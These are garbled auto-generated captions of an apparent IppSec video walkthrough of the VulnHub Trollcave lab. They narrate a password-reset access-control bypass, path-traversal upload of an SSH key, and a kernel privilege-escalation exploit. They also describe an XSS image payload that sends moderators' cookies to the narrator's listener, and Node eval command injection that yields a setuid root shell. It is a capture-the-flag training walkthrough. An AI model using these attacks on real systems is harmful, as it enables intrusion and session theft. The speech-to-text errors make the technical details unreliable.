Vulnhub - Trollcave 1.2

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on YouTube this is IPSec can be doing troll cave from Vaughan hub and pretty much me doing this machine twice the first time around is gonna be when I believe her unintended methods a lot of the frameworks like rails Django CakePHP etc suffer from massive assignment vulnerabilities and just weak permission on route files and I believe this one was just a weak permission on a route so there was a password reset functionality and the super admin users shouldn't have been able to get his password reset by anyone however the password reset was divided into pretty much two different functions and the ACL was only placed on that first function so if you just skipped that first function went to the second one you could reset the super admin user from there you upload a file to get code execution on the box it's an SSH key that's fully intended I believe but once you get low Prive on the box there is a kernel exploit for this Ubuntu version the kernel exploit was kind of a funny story it was a CV back in 2017 you want to fixed it and then recently they had accidentally made themselves vulnerable again so we'll do that kernel exploit to get up to root and then we'll go back to the beginning the box and go through the intended way which involves some cross-site scripting and things like that so let's jump in just rip this box off and into an nmap scan so we're gonna make two nmap and then do a map - SC for default scripts sv and array versions Oh a output all formats we'll call the file initial - scripts then since it's a local box on our local subnet we're gonna do - capital t5 to make the scan go faster and then the IP address of troll cave which in my case is 172 1610 133 I got some error messages I'm not exactly sure what these are the host name looks valid so I'm guessing this script or the sage script I was running with that map was expecting a host name not an IP address and that's why that showed but and that finishes we have two ports open ssh on 22 and HTTP on 80 so I'm gonna poke at HTTP because well there normally not much we can do with SSH HTTP 99 times out of 100 is going to be more interesting so let's go over to the IP address 172 1610 133 and we get a web page so there are a few posts and we should be reading all those but the first things first let's just map out the page so we have three links login register registrations closed well again let's try admin password see what happens invalid username a password we have online users as cool dude it displays the newest members if we click on a username we can look at the URL it says users last five and it gets what looks like a user profile so we have cool dude 89 as a moderator if we look at X he is only a member only me is member let's try the very first user which be a user ID of one King is super admin we have eighty four hits does it actually go up yes it does so we've got a hit counter there so we want to look at all the users on this box so we could use burp intruder or something like that but I'm a huge fan I'm just writing quick Python scripts because you never know where the scripts gonna take you and if you had the skeleton already made you can do cool things pretty quickly so we'll create the script call to get users dot pi and we need the request module and probably regular expressions so input news too and we'll do def get user by ID to create the function response is equal to request get the IP address of troll cave which is 172 1610 133 we want to get slash users and then plus the ID and then dot txt dot strip if we do a username is equal to research there's gonna be a regular expression response and we'll get the first match so we have to go on his profile by viewing the source and we can find out where we want to create the regular expression so if we search for King it's actually gonna be easy if I just do this in terminal I like the highlighting better so save this curl search for King and we have four different spots we have this link that links to a user thing I don't like that because we also have them up here I would suppose if we did at the start of a line we could use a regular expression here and that would be unique uploads I think that's his avatar we have this send p.m. function and this h1 for heading one I think the Sen p.m. is going to be the best because if we go to his profile page I don't see any logic why a profile would have a send p.m. button to another user so that's going to be the unique thing on this page as an example if we had done h1 we can see there exist down here if we did slash users slash one we see it's a bit messy so if we just do recipient name we only see that one match so that is a clear winner of creating the regular expression copy this whole thing control see out go back to a script and we're gonna match against that so we want to do recipient underscore a name is equal to match anything and end with a double quote and then we're just going to return username and then we will print get user by ID one if we did everything correct this should just say king line five so pythons ringing this as a integer we want it to rip the it write as a string and there we go so another thing we may want to do is get the role so get role by ID and that will be the same thing except let's see what it says he's a moderator super moderator let's see if we go to the page super admin we see right here so that's gonna be a hard one to match so let's see copy this I'm guessing that's gonna be slash our /n so we'll try this quickly copy I know Python does block quick comment somehow but can't remember stop ahead so we'll just do this we got to match that which is a bit more difficult so let's see response it's equal to that this above this for clarity sake and let's try roll is equal to read search and we can say and bracket slash our /n b and then maybe if we get lucky that is how the lines are being broken and we can say this is a response group one forgot to return it and no that was not the line break character so find out what that line break character is we're gonna run a curl again fight that 2x XD and then we can search for super to see if that comes back on a line super and there it is so we can see just before that there's a period so it's can't display the ascii if we look here that is 0 a and then 0 a is 1 2 3 4 the fourth bite here as well so 0 a is that line break character so if we edit our script do I get roll no it's still get users we can do back so slash backslash X 0 a and now Python 3 get users and now we successfully get the roll so if we want to enumerate all users we can do a for I in range 0 20 there's a go 20 user IDs and we can do print get user by ID and print get rolled by ID see I can catenate like this thank you again we'll see and we also have to specify I there we go see if that works we got an error right off the bat for the very first user and I have it's starting at zero so let's just do a try and then accept what does do none and now we have a user dump so let's put that to users and try to login so we have the dank man cue Teflon mr. Potato Head so let's just try to login as mr. Potatohead if we go to the login tab mr. Potatohead password will say mr. Potatohead click login and we get you know dot dot dot which is interesting because if that user didn't exist we can invalid username or password so if we put anything in this password field it's displaying something which is odd so I'm guessing this is like a password hint or something not exactly sure what that field is but let's try it with another user like X ER and his head is different so let's grab this text for every user so let's copy get users to get hints and we'll start off by creating a new function so def get hint by ID response is equal to we can just copy this okay and actually payload probably have a lot of parameters we have to pass so let's intercept this and see what is going on so to boot test well again proxy send repeater go and we want to see exactly where that hint thing is so we can create a regular expression to find it so div ID notice how many times is no disappear just one so this is gonna be the regular expression we want to search on so match and we looking at these parameters we see something that looks bad authenticity token so this could be a CSRF cross-site request forgery and we keep getting a response back so I don't think it is if we change the username to be let's say King if we still get this notice back we're gonna say this could be a cross-site request forgery but the applications not accepting it and that looks to be the case so cross-site request forgery essentially would mean when the page generates it puts a unique thing on that page and then once you use it the page will give us through that login thing and then delete the token and what that does is it prevents people from being with a brute force to get victim of cross-site scripting attacks I will link a video in the description of me explaining that a bit better because we actually wrote a Python script to break that but we can ignore it because it doesn't look like it's being used the other ugly thing is we see this utf-8 which is not ASCII characters so I'm gonna see if I can just remove this from the request because I don't feel like putting hex or anything in so it looks like we can just remove that so let's unhex this so we can put it in our Python script or on URL encode it there we go because if we send it in to a Python program like this it may just say oh I'm gonna encode these percents and double encode it which would be bad so just copy that payload is equal to that and we just have to convert this to be valid so that relatively straightforward of what we're doing actually King is not King it can be a variable called user name and session ID set some password we're always gonna login with please subscribe because the password can be anything we want commit is equal to well again that looks good the only thing we have to do is create that username so username is equal to get user by ID and this can be ID okay response was a post request it was so request dot post this is slash login we don't have anything after that and then to put the post data in we do data is equal to payload then we can return response and see what happens hint by ID we'll just comment this out and only do one at a time invalid syntax let's clean that up first so we have one too many characters okay go to the top and that looks bad the change you want was rejected with a 422 if we look at the header of this I don't see that HTML head so we have some error let us send this over to burp so we can figure out what's going on so I'm going to remove this IP and put 127 0 0 1 and then in burp well go to proxy options add a listener will bind to port 80 send this to 172 16 10 133 on port 80 so any requests in the burp on localhost 80 will get forwarded so send this intercept send it over that's not the right one there it is so something was just telling up so let's rename this to be mute my phone Python and this will be called widget so let's copy this thing to see if this looks the same different length D that's good session King password L the password is different so that's why it's the different lengths looks pretty identical so what else is different between these two requests the cookie so get rid of this post that if we copy this cookie what will happen so that's it we got to add the cookie so copy this go back to a script will clear the cache of burp cookies is equal to that and then just convert it help Lakes it how Python likes it 32 session yeah cool one oops okay and then in the actual post request cookie equals cookies okay on this again I think I reversers I want this to be cookie and this to be cookies there we go so go to the top and that looks much better so now we can create that regular expression and then we'll have a script that dumps all the hints so base that and then we can do hint is equal to three search and we'll do notice a question mark that response dot Group one or two and hint and there we go so let's see four I get hit by let's see we wrote unto things will return username and hen and we'll do get hit by ID zero that would be username will make this prettier username is equal to get int by ID let's see I'll call this response it's always tough naming variables on the fly so response zero that will be username and hint will be one actually the cleaner way to do this will just be username head there we go we can do username in try this and that works see that may make it a little cleaner perfectly just do a tab I guess to hints so now we would probably create Hydra list based upon these hints but I don't think it's gonna be useful and we'll just ignore it for now so that whole thing was a fun rabbit hole just to go down doesn't actually do anything in the box to my knowledge just there for fun so the next thing I did on the box once that led me nowhere is went back here and started reading the post because I had hydro going in the background and it never came back with anything so it may just be me feeling the Hydra command which is why I'm not showing the Hydra cause it could be something with that authenticity token so I don't want to show something that maybe broke and I don't know hope that makes sense but I started looking at all these blog posts and reading them so this is just saying what the web page is and then we have a password reset blog post so he says he's implemented a password resets resource and rails and it's about 90% working for the email thing except for the email thing so if we search for this resource password reset rails we go to a real sartorial and let's see is this paid content or not see doesn't look like it is so we can read this and see how this function works so we have a get request to password resets new if we do a post request to password resets does something that's not a get oh there we go there is a get here as well so let's go to that URL see what happens go it doesn't exist going back here we do have a slash new so let's see what slash new is to create a new password reset request and we get something so the very first thing I did was try to reset super admins password and we get can only reset normal members passwords so we can't probably do mod and we can't do users so let's verify that by just counting our users and getting a mod cool dude 89 register nope back back strike cool dude so that is true can only reset regular users passwords so we do X Y or click reset password it emails not working so he's just printing out the magic reset link so if we open this in a new tab we can change x-ers password and the first thing I did was I tried changing this to King and I think this is an unintended rail and now we have bypassed where the ACL was so on this last new request he does a check on King on the new request it's not cane its XE or let's say it creates a reset link however this reset link doesn't have the ACL applied to it so if we specified King we can reset King's password so let's put the password as password click reset and we will be showing the intended way to do it after this it's just a little bit long so do the method I had done first and then explain how I found the actual intended method afterwards click reset and I think my web browser hung so I can't click anything there we go yeah it did hang password too short minimum of 10 characters so we do password one two three four it's odd that my browser hung a little concerning but not too much password has been reset and it just logged us right in so we can see all the different options we have if we go to inbox we have no messages forget a file manager we do have files so first thing I did was try to upload something so if we go to documents hub troll cave let's upload a PHP file so CP shell PHP CMD dot PHP here so that file looks good let's select that my VM is going slow give it a name we'll just do CMD dot php' click upload file uploading is currently disabled so click around here we have a button to enable file upload so let's do that save settings and then we can go to file manager and retry that request file was uploaded so now we have to find out where this file is so we get a file manager user file slash one I start showing where the foul name is two three and it doesn't look there's any ACL because we're hitting other users files so skip around at five ten we error outs and let's go to eight and that's where coop CMD dot PHP is so it's an uploads King CMV dot PHP and let's check that out it just prints this because the webserver doesn't actually have to generate any PHP content.php he's probably not installed or nginx is just ignoring PHP so that's a dead end but if we do have a file upload I wonder if we have any type of path traversal so let's go back to this request HTTP history uploads let's just try doing let's again post this is probably file upload so let's do foul name is equal to dot dot slash CMD two dot PHP and let's see change it here as well click go looks like it uploaded fine if we go back let's see user files nine will be the next one we uploaded and now it uploaded to just upload CMD - dot PHP so we know that this script is vulnerable to path traversal because if we go to public uploads here we xscape the King directory so we should be able put files anywhere we have write access on the server and if we go back to home and start reading things there's another hint on what to do if we go to new features for moderators no password reset now murk down threats oh there's more person now that we're at man let's see blog clearance the king is dead long live the king I think this is it nope sudo give me sudo if we read this post we have heard a guy saying he's logging in with the rails user interactively and this ball post looks like it's rails if we looked at other things I think I may have said it if not free the post you know this server is rails and we know there's probably a rails interactive user so what I'm going to do my VM actually listens go to the terminal and we'll do an SSH key gen - to F and we'll create a rails key so now we're going to upload rails dot pub to the webserver and I'm just going to name this whoops authorized underscore keys go back here file manager upload authorized keys and we'll say dot dot slash a bunch of times then home rails dot SSH authorized keys just taking a guess in the dark of where the rails user directory will be we could probably pull it from that environment variable let's try that real quick and grab home okay let's try this we did home like this and one of this is going to upload will expect I doubt it but we can see something went wrong so I don't think we can use environment variables there so let's just do home rails dot SSH authorized underscore keys upload says the files uploaded if we go back to ten we see the file authorized keys is in her rales SSH so if we chmod 600 so let's rename that to Rails to Rails ID or si - Rails to make it more of a hey this is an SSH key based upon the file name but SH - I ID RSA - rails and then what do rails at 170 to 1610 133 and it lets us log in right away and the very first thing I noticed was Ubuntu 1604 4 and I'll stop my head because well we do hack the box and whenever criminal exploits come out we have to patch a be aware of them I know there's a kernel exploit for this particular Ubuntu which is relatively recent if we search when this kernel was this is actually the saying I saw 116 116 stuck in my head if we look at that Ubuntu kernel and see when that release date was Daniel it's probably this one do we have a date come on I don't see a date here there's no date on that awesome try this one last one let's see date here if not you'll just take my word this kernel is a 20-18 kernel because kernel probe asked was not at the intended method of this box but let's just pull up the exploit so let's go to firefox and just google latest ubuntu privilege escalation and it's this second link it's actually funny it's a CVE from 2017 because ubuntu accidentally reintroduced a old vulnerability and if you want to be patched without updating that's the command you run it is now passionate latest so if you have ubuntu servers may want to update so if we just do let's see where's that CVE he went search boyd for the CVE number and pull up source code so search point no let's see search poit - eh do they have a CVE thing see 2017 95 no title update examine maybe it doesn't have a CVE just google it exploit DB dot-com see v's see there we go should be good that's our kernel version 1 1 6 click raw copy check our box do we have GCC we do not so let's V what's this called don't know we'll just call it exploit dot C set move to paste paste it in GCC it to compile Bay 64 and exploit go to the gang of the line highlight everything get a siege terminal yep SH terminal V exploit be 64 yeah that's not the right clip would that is basics for - D this I probably could have just SCP tip because I've SSH keys but habits die hard + X on exploit I did everything correct we're now route by just executing that so go into slash route and now we can get flag text if we want it to so that is the unintended way to get user and the unintended way to get a pretty vast and I was confused because there's a lot of users on this box curta guy Dave Dragon King rails so a lot of work went into it and I'm just because that was like there's no way that this was a kernel brave ask so I went to poke around the web app a little bit and I noticed this cool guy thing and if we look at the JavaScript we have him getting a page C cool guy mod dot RB like every X minutes so I knew I had done the unintended way to do everything because why would cool guy mod be getting a page every few minutes if I could just instant go up to super admin or even like reset is it cool guy Ikaruga one of them if I could just reset his password why would he be getting a page because that just screams some type of cross-site scripting attack so get out of my shell and we will begin doing this the intended way so let's go back to the troll cave webpage and is there a logout button there it is and just keep reading the post so if we look at this politics and religion thread we have it posted by cool dude 89 and cool dude 89 is a moderator and he will be monitoring this thread very closely so let's see we have to figure a way to put something in the comments so if we went to that reset password page we could reset a user so if we follow this link let's reset a standard user password just do pass with one two three four reset okay logged in as the user and he may be able to do file management upload but that feature was disabled so I'm not even gonna poke at that right now as this user so we can post comments now as a regular user so let's do script was it JavaScript dot alert one I think that's it was it just alert one I'm horrible with cross-site scripting see what that says we don't see any scripts see JavaScript alert so it looked like Ford's scripts got taken out it's definitely some type of red X because it left alone this script so let's see are there any ways we can bypass that expression no see so let's just verify it by doing script and we can do cases first comment see script should be right around here I think we should have put something else in there let's do that I am NOT doing that well so script script testing the cases and please sub search for that string in the page source and we see script actually made its way through that's odd so if the script only not work when there's a slash script yeah where's my web browser doing so slow comment posted refresh this oh I think I really screwed up the comment system cuz I'm not even getting comics anymore test I left some tag open nope there we go so let's try this again script script please sub and we'll do / script it's invalid but who cares test this one more time so it filtered out both of those so all the way up here it was because it was conspan a--from another script I think and why it set the one just flash script that's when I fixed itself so we have it now filtering both of those scripts so let's see if it's a recursive filter so if we do s and they do another script and then CRI PT we can test this so what that's doing is if it only does one pass through it's just going to erase this script and then leave this one intact so we'll see if that works please sub to control you and it did some type of weird HTML entity encoding so we could keep playing around with that or just not use script in a Java Script payload and just not using script is probably the easier route to go so let's go back and create a different JavaScript so we'll do it in an image image source is equal to nothing on error we'll do hip sack on error create a XML HTTP request so we'll do rec is equal to new XML HTTP request okay then rec dot open and do get to make a get request to us so we're one centi to 16 10 168 I believe and you do document dot cookie I think that's right and then rec dot send and that image let's clean this up real quick before we send it to make sure it looks right with actual line breaks so on here we're going to create a XML HTTP request that request is going to open request back to our server and that's going to send the cookie as part of the URL and then that send that looks correct so let's see if this request works and we're going to have to do Python - a simple HTTP server on port 80 he's in use what is being used by 80 Obert let's turn that 4 door off options there we go that listener there we go so post his comment and I don't think I'm that IP address I should've checked that before no I am or if there's an error in my request quest new XML HTTP request okay requests not open that looks good it's gonna be a get request to 172 16 16 darn it paying 172 16 10 16 that's no one so the easiest way to fix this is change my IP address okay now refresh take your semi to sixteen ten one thirty three wise men will come reachable it's on the same subnet 172 will fix the IP that's annoying eh client Keith zero it's good new my P back why don't give me my IP if down eight zero what something odd is going on story of how a typo destroyed everything pain myself camping the Gateway if config easy Rho a 2 16 10 16 met mask 2 5 C let's just change it to 168 what it should be unreachable it's up step samba now we're gonna reachable th client again 0 - fief of boosts listening okay we got an IP of 1 1 1 and I can paying out okay let's go back to burp and change the IP address should be history there's a lot of things to that let's see it's probably a post we can just click back a few times and get here okay see where is that comments now I guess we can just recreate it control you now we have to go to politics in religion draw you requests okay and we copy this paste it and put a new IP I think three ones let's not make that mistake again because that took us down a weird hole there's common comment posted now place on em simple HTTP server on port 80 I click go let's see got that and I got my cookie so now we finally have the cross-site script ding working and it's just a waiting game to see if curta guy hits this if he does we can then put his cookie and place of ours and attempt to hit the page and we'll probably be his user account and there we go we got a another cookie and this time is coming from 10.1 33 which is kurta guys I pee or not care to guys um the IP address of troll cave it looks like we have multiple cookies that's odd so let's go to this window v who is that it's good a guy right now cool guy cool dude cool dude 89 dot paste this once the cookies are separated by what I just put this in burp to decode it decoder smart decode did that work almost like it did so we got 32 session this long string and this got - - a hash and then remember - again this one kind of the same thing so we've got two different 32 session cookies we'll try them both if we copy that then go to Firefox and do we have a cookie editor plugin web IDE tools cookie manager plus search for this 32 session we'll edit this as my cookie paste is in that looks wrong won't see doesn't look right but it is okay it's just weird how it has - - in the hash but now we are cool dude 89 everyone moderator and if we were paying attention we could have seen one more thing pop up I'm not sure what it was maybe post blog so we can post blog visible anyone moderators regular users members so looks like we got something to enumerate groups so let's try to intercept on and see what that is is that just a number see here's the post blog so it looks like it's the clearance center decoder smart decode it's got that utf-8 thing which forces it's going to hex mode so we can just delete that and we got blog clearance equals one so if we drop this requests go back turn on let's make it visible to moderators only there's blog and we got clearance is equal to three so we know we have different groups now so we can do groups mod is three guessing last one was everyone so let's see it's two back without training anything yes regular members let's see what they are regular members is too we need to drop the request I probably just look at the source code there we go that's a bit easier so now we know all the group IDs I'm not sure if that's helpful but it's good just to save it in case it is see is there anything else he has looking at his inbox y-intercept still long no messages file manager reports so just looking like he you could report a user for doing something bad I guess so that is the password hint as we have there there's an avatar some email see a user by in should be something unique that cool guy can do a cool dude let's go back to home and see what new features for moderators to a point matter is this can be done through the users page by clicking him the mod leak next to username you want to promote so if we try to promote someone - there's no promote link back okay if we just go to slash users not an actual page we have a promote link I think against non mods so remember yeah mod so if they're already a moderator that mod isn't there but we can either ban users or we can make them a mod so let's intercept that request to see exactly what happens moot not another sure and let's see what did that do users 14 mod click forward whoops was that last request I was just to get on users so not another was promoted see accept off regular member and not another is now moderator was that the only clicked it's one of many ways there we go yeah so we have moved them to a moderator let's see is there a option to unmod copy the link location users of eleven so let's see what user was not another less users not another is a member I didn't put the ID number them get users let's do that three get users did I just die why isn't that working I really only change this print let's see STI there we go okay so not in other words 14 so let's try changing it to 14 see if we can promote now another to something else see how this mod function works it doesn't exist or do mod if we go less groups try for 4 maybe above admin nope that doesn't work let's go in the history and see how the mods were working let's promote someone intercept it that'd be easier so go back part of this you are now gonna be a mod ok ok so it's not a get request it's a post request I think turn off there see Teflon was 14 I think okay we can just promote Artemis again we'll leave it at 10 so go back to users Artemis is a regular member wait what will she have member before okay so there's member regular member and admin it looks like not again okay she's a moderator so there's no mana link on moderators but what if I just click go and sent that link again and now she's an admin so if we use the mod on a moderator they get promoted to admin so let's do it on a self cool dude cool dude is number five so five promote well being redirected fresh we're still just moderator so followed redirection and click render to view the page doesn't print well see I don't see the error message but I'm guessing we just can't promote herself so let's just do the password reset on Artemis and log in as her so she is 10 you don't even need that we just copy go let's do a new in private window well again we need password reset / password resets new Artemis and I can only reset normal member passwords okay so let's reset ian's and then we'll login as him I don't know I closed that they can't need a window so let's do past resets new Ian I just really grab another moderator Ian's a regular member so we need I guess member anybody home would user that's easy to type XE or anybody did his eyes also so yep so there's dents train member and regular member member is lower so password 1 2 3 4 reset ok let's promote him so we can just intercept this request mod send Astro beater and send this a few times okay we have murder the crap out of him so let's see what he is except on refresh he is now an admin what can admins do doesn't look like really anything else let's go to users there's a none mod so we can take admin privilege away from someone so what happens if we unmod King so King would be one so let's intercept this request demote queue do one can we unmod the king and drop that refresh King did not change see well send that a few times to just demote the crap out of him in case he has like two different groups because we promoted the crap out of our user and was still only admin so maybe super admins heard Godin and now King could be a regular user and the database but so displayed as a super admin so let's log out of a guy do another password reset on King can we reset his password can only resent normal user passwords so no we cannot and let's verify King is indeed one he is one so let's actually follow and do it all through book cuz we may be an error message that we're not saying cell X here password 1 2 3 4 login let's go to users proxy intercept demo Q change this to 1 we aren't putting anything down there forward and turn aricept off and we can't do that to the super admin so let's see so my browser is hung can I scroll down there we go read this post so we know King left us thing for service no News super admin in place and said Kings account will be granted yours truly and will be used sparingly until his return so let's get on dragons account because dragon says he has access to King so if we go to dragons account let's see users dragons in admin so dragon 3 let's demote the crap out of him repeater on mod 3 so now dragon is only a member so we should be a reset his password so password resets dragon and we can but we want it this super secure password 1 2 3 4 and now we are on dragons account so let's check things out if we go to his inbox we have let's see subject is password and we have Kings password here and we changed King's password through the unintended method so I can't login as king but this is how your intended to get Kings password is through this method so let us now just jump on ssh and do the probe ask the intended way so ssh - i IDRs a rails ray at 172 1610 133 so poking around let's see the first thing I would do on this box before we get into the probe ask is look at the troll cave we can go to been not been config and look at database dot y mo y ml and we can see there is a Postgres server and there is SQL light so production sounds good so let's access this Postgres server so if we do a net stat - a Ln P grab for list for listening ports we have Postgres running on 5 4 3 2 that is the default port for Postgres we also have something running on quad 8 which is odd I don't know what that is well I do but that is unique so let's look at Postgres so we're going to hit the squiggly which is this key and you have to do this as part of a new line so do that hold but hit that squiggly I just said and then do C to drop into an SSH prompt and we can do we can do help to see what it is but this shows us different ways we can do port forwarding in SSH so instead of just Xing out every time and then doing SH - L that's just a shortcut to get into the SSH menu so again it only works as soon as you get to a new line but that's the keystroke you hit hold shift and hit the I think that's a toad a and then C against this menu they can do - L we want 5 4 3 2 localhost 5 4 3 2 so what this did is 4 point 5 3 2 5 4 3 2 on a local host to this server through an SSH connection and pointed it to local five four three two so now I can load up database beaver which is a GUI to access a lot of different types of databases and I'll probably have to delete a connection nope so we can just do clues let's delete this connection real quick and create a new connection so if we create new connection we can name this PostgreSQL next is a username we can get this out of that yellow file it's going to be TC and here's the password ok connection type we could say production I don't think that matters actually but we can access this go in schema go on public tables and there's nothing here so this database looks like it's empty so maybe it's still in the development stage so let's go back and it's in DB directory so CD CD DB let's see there's nothing in tests there's stuff and development dot sequel a 3 so we can do sequel Lite 3 development I'm gonna do like dot tables to list the tables we can do select star from private messages to see if there's any private messages we missed we could also select star from users get a bunch of password hashes this is actually a relatively secure format as be crimped so probably won't be able to crack those maybe with the password hints we could you get us to do dahm but just things to look at as you're going through so if we could uh let's see PS - TF well just do Linux e number a enumeration script let's see what that shows us so CP Linux pretty esque when enum got SH Python C no no Python am simple HTTP server it's on 8,000 so cool 172 16 10111 when UNAM sh pipe to bash and we can run through this once this script finishes that should be good enough to start looking at so let's go to the top wit ran min starts going down we have the kernel information which we know this was exploitable first name troll cave user group king is logged in on TTY that's odd I wonder if we could get that password I don't know maybe I'll get that password won't check who else has logged in the rails user I guess it depends how he logged in coda guy see proc su ID so files not own there's a lot environment variables networking ports let's look at what's there and by root on process list something maybe here maybe not so before I begin all right start going down I just want to check out something real quick to see if King's passwords are there so if we do get hub mini penguins see is this it from the current linux user well the current Linux desktop that's not gonna work ought to dump passwords see is this going to do it actually we're not rude so we can't do that I don't know why I was thinking we could just magically dump the password and where's this bar here let's get rid of this bar that's ugly so let's see let's check out what port 888 was so cool localhost it's going slow for eights and we see it is a web page so all right off the bat let's just for this point two dash L for 888 on my machine to there so now if I go on localhost for eights we get the Kings calculator if we click calculate we get an error message if we get rid of that encoding I think that should work and we have crashed the program at which case it takes a few seconds to pack up there we go so it doesn't like any type of encoding we do one space one what happens yeah it's treating spaces as plus and for some reason if we send the program a plus send it to be to be encoded then it gets a plus and freaks out I guess it's a very buggy program so let's say we can find that source let's see it's as calc so let's see fine / - name calc davin all and we got something in home King calc so if we go to home King go in calc we got calc JavaScript so let's look at this we have them we do so this looks like a node.js thing we have something commented out because of a security risk let's make sure this is the one that's running because perhaps the calc is running out of a different location we don't have access to and this ping function still exists so if we case to ping let's see cool localhost let's just end this - Bert use the tool how it's meant to be used says - repeater we get - so that works get slash ping not found if we get calc and do nothing it airs out so we can deduce that this is probably commented out on whatever is running so let's keep going down the code see if anything sticks out we do have a case for calc a case default and default displays 404 so calculate the only thing we want to do and the function of calc is going to do some split the query on equals so I'm guessing our payload can't have any equals in it that's a bad character and we get a eval down here so evil is generally really bad we can just execute code so if we write JavaScript to execute a command I'm guessing we can get this too so let's see what would be a Java nodejs so we can do no js' hello world bye guy turn intercept off so we can look at the function for node to print something res dot send is how you print and this so let's try that repeater see get calc was it some is equal to res dot send hello see what happens looks like it crashed we didn't get anything back so we can try console.log see if that does anything nothing wait for this start working and then we can try just executing commands next when reset there we go let's back up so let's just try a way to execute commands I was open the hello world would actually work and we could have a proof-of-concept but let's just jump straight to the good stuff so let's do require shy old process and I just got this through googling different ways to execute commands through JavaScript dot spawn you can do Who am I if we send this we get an object back so I couldn't get it to actually output the string but we can and do something like touch and then spawn requires arguments bet like this so slash tab test I think that's right Victor so if we look at this and go to slash town there's a file called test and it's owned by King so let us get that set UID program that we did and pretty much every other video where we use set UID come on in here I'm clicking and there we go not to rebuild this VM or something because certainly go slow and that weird thing with the ethernet adapter I guess something got hosed anyways let's go to opt shall set u ID and we can copy this to ya if we look at the code it's just gonna do a set UID and then execute then Sh so let's compile that exec see compiling here because we don't have a compiler on which we'll call it troll cave it didn't have GCC on it so we could probably just add the set u ID bit too like VI or something and do it that way but this is just as easy so we do melt crap no soo in let's see rap on slash temp slash temp doesn't have the new set UID bit set so we can just create this so call this King taste and let that's the first time actually did the correct pace first try decode this we do dot slash King chmod plus x king okay the program works so go here we will do a CH own and we'll try King King on tab King and that did not work specify it like this did not like that did not like the space one bit [Music] can we do it like this let's get back to what we were look here's a tape well touch okay we got object object send this to a new repeater so we can always give back to that CH rep King 1000 so grab 1000 Etsy group it is king and what if I just don't know how to pass multiple arguments this way we do it in single quotes CH own King King to temp King I almost had a typo oh no I still didn't run the CH own which CH own will do a slash bin specify the full path should need to nope so let's just do run need on SH CH own King King tap King and chmod plus s tap King let's say we can do this so - and specify just tap Rodney dot Sh still owned by rails let's change this to exec temp from a sh Peter slang for a second huh and it's still owned by rails so that should have been executing so let's see what if we go back and we try to do move tap King to tap King - that can work no the run read on SH touch slash tap will do pwned so that's going to tell us if the script ran and I guess we can send error messages to tap pwned okay let's try this again exact temper on me click go LS - la we got pwned but it's still not taking ownership of the King binary which GCC doesn't exist Oh duh King isn't a root user so if we see Peking to /home King let's see veer on me let's see P temp King to home King shell oh um King shell and we can say set UID bit read write execute and read execute to everyone else I think that is get rid of this so King could it just take ownership of temp King because he's not a root user so we should be able to do this actually let's see oh we ditched it this way temper on me click run go to /home king we got shell shell was owned by King and it doesn't have the set UID bit let's just do + yes chmod should did it don't need those lines click go still no set UID so maybe no set UID is on the home directory No that should have worked uh-huh you don't execute read execute execute CH own I do something really stupid no chmod I did do something really stupid flash home King shell thank God I'm almost done this video making mistakes left to right now okay l SLA we have the shell and owned by King we got set UID on it but it still didn't put us as king which Ben Sh go away Ben Sh it is going to - natural way to switch to the King user actually I think I know king is 1000 so let's change the set UID program I should do like it get you ID right there if this is the actual problem so then that number becomes dynamic I don't have to worry about doing a set UID every single time I change that number every time I want to run this program but I don't remember actually having to do that so that's odd pasted 864 dash D temp shell to shell computers lagging for a second there we go okay temp run Meade SH we need to modify this so CP Tapsell - King shell and now we can do what do shell 2 and CH own King King there we go now if I click run me know SLA we got shell 2 I think I screwed up with that s you gotta give execute temper on me was it four seven five five you know do seven five five it won't wipe that bit we'll see will you wait yes it did so let's do four seven five five we can do plus s now plus s okay now we're king so that number does matter I'll have to fix that she'll to actually get the uid beforehand I think capital S maybe like super set you idea what sets the UID and group ID Oh No okay I want to do sudo - L and we can see King may run any command so if we do sudo su - now we are root so that is the intended way to do that box take care guys

Info

Channel: IppSec

Views: 12,861

Rating: undefined out of 5

Keywords: rails, nodejs, file upload, path traversal, ssh key, ippsec, VulnHub, command injection, eval, learn2code, python, CVE-2017-16995, Kernel, XSS, Cookie Theft

Id: 2EW78bkwztg

Channel Id: undefined

Length: 103min 40sec (6220 seconds)

Published: Sun Apr 15 2018